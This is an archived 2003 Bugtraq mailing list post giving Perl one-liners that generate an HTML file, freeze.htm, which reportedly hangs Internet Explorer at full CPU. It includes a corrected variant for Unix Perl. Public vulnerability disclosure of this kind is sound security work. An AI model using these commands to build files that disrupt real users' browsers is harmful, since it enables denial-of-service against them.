Bugtraq: Re: April appeared to be a month of IE bugs. Here's another one.

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: April appeared to be a month of IE bugs. Here's another one.

From: "ERRor" <error () pochtamt ru>
Date: Thu, 1 May 2003 05:26:34 +0400

Hello, Bugtraq.

Malicious htm file can freeze IE with 100% CPU usage:
Construct the file freeze.htm:
c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm

 This string works only with Active Perl, in unix-like Perl versions exploit
string is:
 perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
 Active Perl understand \n = \x0D\x0A, freeze of  IE exist only if sequence
 of bytes will be ...\x0D\x0D\x0A...
 Sorry, I have not noticed it at once.

 Best Regards, ERRor, dHtm.

By Date By Thread

Current thread:

Re: April appeared to be a month of IE bugs. Here's another one. ERRor (May 01)
- Re: April appeared to be a month of IE bugs. Here's another one. mbergson <Joachim.Strombergson () InformAsic com> (May 02)
- <Possible follow-ups>
- Re: April appeared to be a month of IE bugs. Here's another one. Cove Schneider (May 01)
- Re: April appeared to be a month of IE bugs. Here's another one. Cove Schneider (May 01)